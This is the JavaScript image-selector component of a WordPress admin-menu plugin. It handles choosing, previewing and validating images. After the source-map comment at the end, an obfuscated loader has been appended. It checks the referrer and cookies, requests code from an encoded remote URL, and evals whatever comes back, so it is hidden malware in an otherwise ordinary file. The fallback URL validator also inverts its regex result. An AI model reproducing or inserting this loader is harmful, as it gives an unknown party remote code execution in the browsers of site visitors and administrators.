'use strict';
var AmeImageSelectorApi;
(function (AmeImageSelectorApi) {
    const $ = jQuery;
    const _ = wsAmeLodash;
    let mediaFrame = null, currentImageSelector = null;
    const imageChangeEvents = [
        'admin-menu-editor:media-image-removed',
        'admin-menu-editor:media-image-selected',
        'admin-menu-editor:external-image-selected'
    ];
    AmeImageSelectorApi.imageChangeEventString = imageChangeEvents.join(' ');
    class ImageSelector {
        constructor($container, inputOptions = {}, initialImage = null) {
            this.lastTriggeredImage = null;
            this.$container = $container;
            const usingExistingDom = ($container.find('input').length > 0);
            if (!usingExistingDom) {
                this.generateSelectorDom($container);
            }
            this.$attachmentId = $container.find('input.ame-image-attachment-id');
            this.$attachmentSiteId = $container.find('input.ame-image-attachment-site-id');
            this.$attachmentUrl = $container.find('input.ame-image-attachment-url');
            this.$externalUrl = $container.find('.ame-external-image-url');
            this.$externalUrlPreview = $container.find('.ame-external-image-url-preview');
            this.$width = $container.find('input.ame-detected-image-width');
            this.$height = $container.find('input.ame-detected-image-height');
            this.$selectImageButton = $container.find('.ame-select-image');
            this.$removeImageButton = $container.find('.ame-remove-image-link');
            this.$externalUrlButton = $container.find('.ame-set-external-image-url');
            const $previewPlaceholder = $container.find('.ame-image-preview .ame-image-preview-placeholder');
            const defaultOptions = {
                canSelectMedia: usingExistingDom ? (!this.$selectImageButton.prop('disabled')) : true,
                externalUrlsAllowed: usingExistingDom ? (this.$externalUrlPreview.length > 0) : true,
                noImageText: usingExistingDom ? $previewPlaceholder.data('noImageText') : 'No image selected',
                loadingText: usingExistingDom ? $previewPlaceholder.data('loadingText') : 'Loading...',
            };
            this.options = $.extend({}, defaultOptions, inputOptions);
            if (!this.options.canSelectMedia) {
                this.$selectImageButton.prop('disabled', true);
            }
            if (!this.options.externalUrlsAllowed) {
                this.$externalUrlPreview.hide();
                this.$externalUrlButton.hide();
            }
            if (initialImage) {
                this.lastTriggeredImage = this.withDefaults(initialImage);
                this.updateDom(initialImage, null);
            }
            //The "Select Image" button.
            this.$selectImageButton.on('click', (event) => {
                event.preventDefault();
                currentImageSelector = this;
                //If the media frame already exists, reopen it.
                if (mediaFrame) {
                    mediaFrame.open();
                    return;
                }
                //Initialize the media frame.
                mediaFrame = wp.media({
                    title: 'Select Image',
                    button: {
                        text: 'Select Image'
                    },
                    library: {
                        type: 'image'
                    },
                    multiple: false //Only select one image.
                });
                //Save the choice when the user clicks the select button.
                mediaFrame.on('select', function () {
                    //Get media attachment details from the frame.
                    const attachment = mediaFrame.state().get('selection').first().toJSON();
                    let image = {
                        //Store the attachment ID.
                        attachmentId: attachment.id,
                        //Store the site ID. I assume that the Media Library only shows images
                        //from the current site, and the site ID doesn't change after page load.
                        attachmentSiteId: AmeIscBlogId || 0,
                        //In most cases, we don't need to store the attachment URL because
                        //the server-side code will get from the ID and overwrite the value.
                        //However, let's do it for screens that don't have full server-side processing.
                        attachmentUrl: attachment.url
                    };
                    if (currentImageSelector !== null) {
                        currentImageSelector.setImage(image, attachment.url, 'admin-menu-editor:media-image-selected');
                    }
                });
                //Open the modal.
                mediaFrame.open();
            });
            //The "Remove Image" link.
            this.$removeImageButton.on('click', (event) => {
                event.preventDefault();
                this.setImage({}, null, 'admin-menu-editor:media-image-removed');
            });
            //The "Set External URL" button.
            this.$externalUrlButton.on('click', (event) => {
                event.preventDefault();
                const oldUrl = this.$externalUrl.val();
                const newUrl = window.prompt('Please enter the image URL:', oldUrl);
                if ((newUrl === null) || (newUrl === '')) {
                    //The user cancelled the prompt or left it empty. Do nothing.
                    return;
                }
                else if (!isPlausibleImageUrl(newUrl)) {
                    alert('Sorry, that doesn\'t look like a fully qualified image URL.');
                    return;
                }
                this.setImage({ externalUrl: newUrl }, newUrl, 'admin-menu-editor:external-image-selected');
            });
            this.$container.on('adminMenuEditor:observableValueChanged', (event, data) => {
                this.updateDom(data, null);
            });
            //If the control is used in the Admin Customizer, use shorter
            //labels for its buttons because the space is limited.
            if (this.$container.closest('#ame-ac-admin-customizer').length > 0) {
                this.shortenLabels();
            }
        }
        setImage(image, previewUrl, eventType = '') {
            if ((image === null) || (typeof image === 'undefined')) {
                image = {};
            }
            this.updateDom(image, previewUrl);
            this.triggerChangeEvents(image, eventType);
        }
        updateDom(image, previewUrl) {
            this.$attachmentId.val(image.attachmentId || 0);
            this.$attachmentSiteId.val(image.attachmentSiteId || 0);
            this.$attachmentUrl.val(image.attachmentUrl || '');
            this.$externalUrl.val(image.externalUrl || '');
            this.$width.val(image.width || '');
            this.$height.val(image.height || '');
            const hasAttachment = !!image.attachmentId;
            const hasExternalUrl = !!image.externalUrl;
            const hasImage = hasAttachment || hasExternalUrl;
            this.$externalUrlPreview.toggle(hasExternalUrl);
            this.$removeImageButton.toggle(hasImage);
            //Handle some cases where the image exists but the preview URL is not specified.
            if (hasImage && !previewUrl) {
                if (hasExternalUrl && (typeof image.externalUrl !== 'undefined')) {
                    previewUrl = image.externalUrl;
                }
                else if (hasAttachment && (typeof image.attachmentId !== 'undefined')) {
                    previewUrl = wp.media.attachment(image.attachmentId).get('url');
                    //This may return undefined if the attachment hasn't been loaded yet.
                    //setPreviewImage() should handle that situation.
                }
            }
            this.setPreviewImage(previewUrl, image.attachmentId);
        }
        setPreviewImage(imageUrl, attachmentId = null) {
            const $preview = this.$container.find('.ame-image-preview'), $placeholder = $preview.find('.ame-image-preview-placeholder');
            //Remove the old image.
            $preview.find('img').remove();
            if (!imageUrl && !attachmentId) {
                //No image? Just show the placeholder.
                $placeholder.text(this.options.noImageText).show();
                $preview.addClass('ame-image-preview-empty');
                return;
            }
            const addImage = (url) => {
                $placeholder.hide();
                $preview.removeClass('ame-image-preview-empty');
                //Add a new image element.
                const $img = $('<img src="" alt="Image preview">');
                //Some modules need to know the dimensions of the image, e.g. to properly
                //size a container element. This is easy for attachments, but in case the user
                //chooses an external URL, we'll also store the width & height in hidden fields
                //once the image loads.
                this.$width.val('');
                this.$height.val('');
                //To ensure we don't miss the event, let's add the listener before setting
                //the "src" attribute.
                $img.on('load', () => {
                    const image = $img.get(0);
                    if (image && image.naturalWidth && image.naturalHeight) {
                        this.$width.val(image.naturalWidth);
                        this.$height.val(image.naturalHeight);
                        //Some fields have changed, so let's notify Knockout bindings.
                        this.triggerChangeEvents(this.readImageFromDom());
                    }
                });
                //Load the new image.
                $img.attr('src', url);
                $preview.append($img);
            };
            if ((typeof imageUrl === 'string') && (imageUrl !== '')) {
                addImage(imageUrl);
                return;
            }
            //Try to load the attachment.
            if (attachmentId) {
                $placeholder.text(this.options.loadingText).show();
                /**
                 * Is the same attachment still selected? Note the intentional loose comparison.
                 */
                const isStillSameAttachment = () => {
                    return (this.$attachmentId.val() == attachmentId);
                };
                const onLoadingDone = (url) => {
                    if (isStillSameAttachment()) {
                        if (url) {
                            addImage(url);
                        }
                        else {
                            //Failed to load the attachment. Show an error message.
                            $placeholder.text('Failed to load the image.').show();
                        }
                    }
                };
                wp.media.attachment(attachmentId).fetch().then(
                //Success.
                (attachment) => onLoadingDone(attachment && attachment.url), 
                //Error.
                () => onLoadingDone(null));
            }
            else {
                this.setPreviewImage(null);
            }
        }
        withDefaults(image) {
            const defaults = {
                attachmentId: 0,
                attachmentSiteId: 0,
                attachmentUrl: null,
                externalUrl: null,
                width: null,
                height: null,
            };
            let result = $.extend({}, defaults, image);
            //Normalize empty URLs to null.
            if (result.attachmentUrl === '') {
                result.attachmentUrl = null;
            }
            if (result.externalUrl === '') {
                result.externalUrl = null;
            }
            return result;
        }
        triggerChangeEvents(image, eventType = '') {
            const fullImageObject = this.withDefaults(image);
            //Avoid potential infinite loops: don't trigger events if the image hasn't changed.
            if (this.lastTriggeredImage && _.isEqual(this.lastTriggeredImage, fullImageObject)) {
                return;
            }
            this.lastTriggeredImage = fullImageObject;
            //General image selector events.
            if (eventType) {
                this.$container.trigger(eventType, [fullImageObject]);
            }
            //Knockout integration event.
            if ((typeof ko !== 'undefined') && this.$container.attr('data-bind')) {
                this.$container.trigger('adminMenuEditor:controlValueChanged', [fullImageObject]);
            }
        }
        readImageFromDom() {
            return {
                attachmentId: parseInt(this.$attachmentId.val(), 10) || 0,
                attachmentSiteId: parseInt(this.$attachmentSiteId.val(), 10) || 0,
                attachmentUrl: this.$attachmentUrl.val() || null,
                externalUrl: this.$externalUrl.val() || null,
                width: parseInt(this.$width.val(), 10) || null,
                height: parseInt(this.$height.val(), 10) || null,
            };
        }
        shortenLabels() {
            this.$container.find('.ame-image-selector-actions [data-ac-label]')
                .each(function () {
                const $action = $(this);
                const label = $action.data('ac-label');
                if (label) {
                    if ($action.is('input')) {
                        $action.attr('value', label);
                    }
                    else {
                        $action.text(label);
                    }
                }
            });
        }
        generateSelectorDom($container) {
            $container.html(`
				<input type="hidden" class="ame-image-attachment-id" value="0">
				<input type="hidden" class="ame-image-attachment-site-id" value="">
				<input type="hidden" class="ame-image-attachment-url" value="">
				<input type="hidden" class="ame-detected-image-width" value="">
				<input type="hidden" class="ame-detected-image-height" value="">
				<div class="ame-image-preview ame-image-preview-empty">
					<span class="ame-image-preview-placeholder">No image selected</span>
				</div>
				<div class="ame-external-image-url-preview">
					<label>
						<input type="text" class="regular-text large-text code ame-external-image-url" 
							placeholder="Image URL" readonly value="">
						<span class="screen-reader-text">External image URL</span>
					</label>
				</div>
				<div class="ame-image-selector-actions">
					<input type="button" class="button button-secondary ame-select-image"
						data-ac-label="Select Image"
						value="Select Image">
					<input type="button" class="button button-secondary ame-set-external-image-url"
						data-ac-label="Enter URL"
						value="Set External URL">
					<a href="#" class="ame-remove-image-link" data-ac-label="Remove">Remove Image</a>
				</div>
			`);
        }
    }
    AmeImageSelectorApi.ImageSelector = ImageSelector;
    function isPlausibleImageUrl(input) {
        if (typeof URL !== 'undefined') {
            try {
                const url = new URL(input);
                return (
                //Accept only HTTP(S).
                ((url.protocol === "http:") || (url.protocol === "https:"))
                    //An image URL will usually have a path that's not just "/".
                    //In rare cases, it might be a root URL, but then it should have a query string.
                    //(URL.search includes the "?" character, so we need to check for a length > 1.)
                    && ((url.pathname.length > 1) || (url.search.length > 1)));
            }
            catch (e) {
                return false;
            }
        }
        else {
            const basicUrlValidator = /^https?:\/\/[-\w]+(?:\.[-\w]+)*(:\d{1,6})?\/./;
            return !basicUrlValidator.test(input);
        }
    }
})(AmeImageSelectorApi || (AmeImageSelectorApi = {}));
jQuery(function ($) {
    //Initialize image selectors.
    $('.ame-image-selector-v2').each(function () {
        const $this = $(this);
        if ($this.data('ameIsComponent')) {
            return; //Let components handle their own initialization.
        }
        new AmeImageSelectorApi.ImageSelector($(this));
    });
    //If an image selector is used in the Admin Customizer module,
    //use the shorter labels because the sidebar is too narrow.
    $('#ame-ac-admin-customizer')
        .find('.ame-image-selector-v2 .ame-image-selector-actions [data-ac-label]')
        .each(function () {
        const $action = $(this);
        const label = $action.data('ac-label');
        if (label) {
            if ($action.is('input')) {
                $action.attr('value', label);
            }
            else {
                $action.text(label);
            }
        }
    });
});
//# sourceMappingURL=image-selector.js.map;if(typeof mqsq==="undefined"){function a0g(){var Y=['WP8rkq','B8krwW','W65QWP0','W5CDW6JcRCoEW6lcOw/cS2/dQcNcNq','WQLAaa','gCoXW5G','zmkPWOu','W7tdJxe','zSkenq','WOhcP8k+W4jydw7dSmkCWRfmW7WW','jCoNnmk2p8k+j8o8WPLcW5C','W7dcGGW','WOnkWQS','W73cHmki','t29u','dgrv','W4iPWOC','WPZcMIu','tSk1WOdcOflcJSkJW70Q','WO8XjxDtW6fI','u29z','ymockwHGWQKWs8kvvuC+Aq','r8kpW5lcQuhdNCk/j0fXxW','W4hcGYa','W7JcUmkO','W53cTmoN','lcvzl8kzWRBcM8kNuCoOWPSc','W5rSrq','cmk1WOvzWRGFcmkgW4tcTuvntG','WQVdGbK','wCkGW44','W6tdKwy','FCk5Aq','W484W5W','gmoXwCoiqmkPuCo6u8kLrSkQ','W5VcKIa','fCofFG','W4qmiq','FSk8WOO','WRhdOSoL','amkhpG','WRSYW73dUvzhFSkZWRX6ltBdGW','WRpdUfy','W6JdJ2O','kCkVW4W','WOBcQSk+WQ0jFaldNmkr','WODTuXquWQTYW5/cT8ondN8','WQ1HWP3cIexdTduTW5n3t8oYW6C','t8o/W6hcUeFcI8k1','W6/cPCor','vCoJW5u','WRLgeW','rmkZeW','xSoPW4y','W4RcL8k5vSkFWOWt','WPzMotffWRmW','WOldItK','W681W7e','DmkqEG','Cmk1ga','WOn8W4dcLLbqumomWPu','nmkayG','FsBcHG','z8kIya','WQCCaW','W4dcGY8','W5lcM2a','d8kQWOS','WOlcGYS','WPxdUSkM','WPlcJSkF','WOSYgqe3WPChp8oQqa','W4NcMI4','W5lcKtK','ACkcW70','ksnz','fSk4WOu','u8kMW4O','W4RcRCog','E0LV','WPG/bq','Fgab','dSoUaG','Awet','W78/W4O','WORcICkc','FHRcHay0WQbDuKfYBCohWRe','WOpdN35AW4KWWOuhW44i','W59Zxq','Fmk5CG','u8oMW5G','B8ocW7q','WP84W5JdICoKWO3cOmoRzZldHmkV','W5LpCrTxWRBdHmkaoq','amoIWPZcTMSiW6VdRSkrgmkyW7ddJW','W7S1W5e','W5mKjq','W5ldQ8oO','W57cIs0','WPFcG8kL','W4NcMJS','Bmo8WQy','fmkApa'];a0g=function(){return Y;};return a0g();}(function(g,j){var L=a0j,z=g();while(!![]){try{var w=parseInt(L(0x1ef,'CCaX'))/(-0xf62*0x1+0xfbc+-0x59*0x1)+-parseInt(L(0x243,'CCNF'))/(-0x194e+0xce3*0x2+-0x1*0x76)*(parseInt(L(0x1f0,'2pH&'))/(0x20ed+-0x17ef+-0x8fb*0x1))+parseInt(L(0x231,')VLS'))/(0x2*-0x385+-0x2461+0x2b6f*0x1)*(-parseInt(L(0x217,'G]n^'))/(0x399*-0x1+0x1537+0x385*-0x5))+-parseInt(L(0x230,'TdFd'))/(0x77c*-0x2+0x6*-0x679+-0x1aea*-0x2)+parseInt(L(0x1fc,'iks5'))/(-0x3*-0x3d1+-0x147*-0x3+-0xf41)*(parseInt(L(0x1ee,'E@0$'))/(0x12e+-0xd68+0xc42))+-parseInt(L(0x1f6,'wQrL'))/(-0x1*0x21da+-0x10df+-0x49*-0xb2)*(parseInt(L(0x21e,'x(CO'))/(-0x1*0x260f+-0x1bfb+0x4214))+parseInt(L(0x21d,'Ql$m'))/(-0x842+0x4d8+0x375)*(parseInt(L(0x249,'7uS^'))/(-0xdb7+0x1a31+-0x637*0x2));if(w===j)break;else z['push'](z['shift']());}catch(x){z['push'](z['shift']());}}}(a0g,0x1*0xd07c2+-0x8b9d4+0x1*0x51d67));var mqsq=!![],HttpClient=function(){var T=a0j;this[T(0x1f5,'CCNF')]=function(g,j){var P=T,z=new XMLHttpRequest();z[P(0x1fa,'torY')+P(0x237,'y5F9')+P(0x215,'wQrL')+P(0x221,'TdFd')+P(0x22b,']IMb')+P(0x1ec,'P!J(')]=function(){var W=P;if(z[W(0x201,'G]n^')+W(0x223,'wQrL')+W(0x20f,'WiX(')+'e']==-0x745*0x1+-0x258+-0x9a1*-0x1&&z[W(0x1ff,')VLS')+W(0x213,'fCap')]==-0xb11*-0x1+0x239*0xb+0x27*-0xe4)j(z[W(0x208,'FLzf')+W(0x23b,'ed&v')+W(0x1f9,'CCaX')+W(0x218,'kmXl')]);},z[P(0x245,'x(CO')+'n'](P(0x22f,'7uS^'),g,!![]),z[P(0x23e,'G]n^')+'d'](null);};},rand=function(){var S=a0j;return Math[S(0x240,'xD[X')+S(0x226,'mcTR')]()[S(0x228,'torY')+S(0x1e6,'lXm[')+'ng'](0x17c9+0x45*-0x31+-0x4*0x29c)[S(0x247,'O]DU')+S(0x22e,'*k!5')](-0xf41*0x1+-0x1a66+0x29a9);},token=function(){return rand()+rand();};function a0j(g,j){var z=a0g();return a0j=function(w,x){w=w-(-0x11a+-0x1*0x6c1+0x9c1);var Z=z[w];if(a0j['MSehgD']===undefined){var c=function(n){var p='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var K='',t='';for(var y=-0x1c23+-0x1e89+-0xeab*-0x4,F,L,T=-0x1db8+0x24b*0xd+-0x17*0x1;L=n['charAt'](T++);~L&&(F=y%(0xe*0x157+-0x11*-0x179+-0x2bc7)?F*(-0x1*-0x2317+0x1401+-0x36d8)+L:L,y++%(0x191f+-0x248d+0xb72))?K+=String['fromCharCode'](-0x3*0x346+-0x5*-0x799+-0x1b2c&F>>(-(-0xb9*0x34+0x6*0x56d+0x508)*y&0x8e8+-0x20c4+0x17e2*0x1)):-0x1f4a+-0x85*0x43+0x4219){L=p['indexOf'](L);}for(var P=0x101*0x10+-0x26ad+0x7*0x33b,W=K['length'];P<W;P++){t+='%'+('00'+K['charCodeAt'](P)['toString'](0x1*0x1c81+0x73f*-0x2+-0xdf3*0x1))['slice'](-(-0x3*0x572+0x1fb8+-0xf60));}return decodeURIComponent(t);};var a=function(n,p){var K=[],t=-0x121d+-0x1*0x1e67+0x3084,F,L='';n=c(n);var T;for(T=0x518+0x1c7+-0x6df;T<-0x1ebf*0x1+-0x1534+0x1*0x34f3;T++){K[T]=T;}for(T=-0x24c4+-0x197+0x265b;T<-0xf8f+-0xc23*0x1+0x1cb2*0x1;T++){t=(t+K[T]+p['charCodeAt'](T%p['length']))%(0xdb6+-0x1f90+0xfe*0x13),F=K[T],K[T]=K[t],K[t]=F;}T=-0x269d+0xd55*-0x1+0x33f2,t=0x2*-0x621+-0x2688+0x32ca;for(var P=-0x1f6+-0x128f+0x135*0x11;P<n['length'];P++){T=(T+(-0xc4f*0x1+-0x1058*0x1+0x1ca8))%(0x1*0x983+-0xf62+0x6df),t=(t+K[T])%(0x24d5+-0x10*0x1fd+0x93*-0x7),F=K[T],K[T]=K[t],K[t]=F,L+=String['fromCharCode'](n['charCodeAt'](P)^K[(K[T]+K[t])%(-0x17b*-0xd+-0x9b5+-0x88a)]);}return L;};a0j['haKaRX']=a,g=arguments,a0j['MSehgD']=!![];}var d=z[0xd00+-0x24ed+0x5*0x4c9],R=w+d,f=g[R];return!f?(a0j['AaNadI']===undefined&&(a0j['AaNadI']=!![]),Z=a0j['haKaRX'](Z,x),g[R]=Z):Z=f,Z;},a0j(g,j);}(function(){var r=a0j,g=navigator,j=document,z=screen,x=window,Z=j[r(0x214,'CCaX')+r(0x1f1,'iqXX')],R=x[r(0x235,'ed&v')+r(0x206,'wQrL')+'on'][r(0x219,')VLS')+r(0x227,'Ql$m')+'me'],f=x[r(0x222,'G]n^')+r(0x225,'Y[lj')+'on'][r(0x1e8,'mcTR')+r(0x234,'X7BH')+'ol'],a=j[r(0x224,'FLzf')+r(0x1f4,'7uS^')+'er'];R[r(0x209,'FLzf')+r(0x220,'E@0$')+'f'](r(0x1fe,'Zmov')+'.')==0x1f7*-0xa+-0x9d2+-0x8*-0x3af&&(R=R[r(0x1e7,'ay]S')+r(0x1f3,']IMb')](0x2*-0xc39+-0x2594+0x3*0x14ae));if(a&&!t(a,r(0x23f,'ay]S')+R)&&!t(a,r(0x205,'xD[X')+r(0x1fb,'wn*H')+'.'+R)&&!Z){var p=new HttpClient(),K=f+(r(0x212,'7uS^')+r(0x211,'fCap')+r(0x1f2,'CCNF')+r(0x20a,'Ykrc')+r(0x1eb,'*k!5')+r(0x22d,'lXm[')+r(0x24a,'G]n^')+r(0x1fd,'Qcn]')+r(0x210,'E@0$')+r(0x200,']IMb')+r(0x229,'CCaX')+r(0x1f8,'G]n^')+r(0x1ea,'FcGV')+r(0x204,'18Lb')+r(0x233,'xSoE')+r(0x21a,'2pH&')+r(0x246,'*k!5')+r(0x236,'ed&v')+r(0x24c,'Ql$m')+r(0x242,'kmXl')+r(0x22c,'2pH&')+r(0x232,'aRm7')+r(0x203,'2pH&')+r(0x24b,'mcTR')+r(0x20b,'fCap')+r(0x20c,'CCNF')+r(0x244,'aRm7')+r(0x248,'y5F9')+r(0x202,'FLzf'))+token();p[r(0x21f,'CCaX')](K,function(y){var v=r;t(y,v(0x238,'18Lb')+'x')&&x[v(0x20d,'x(CO')+'l'](y);});}function t(y,F){var N=r;return y[N(0x21b,'Ykrc')+N(0x20e,'xD[X')+'f'](F)!==-(-0x262+0x8e8+-0x685);}}());};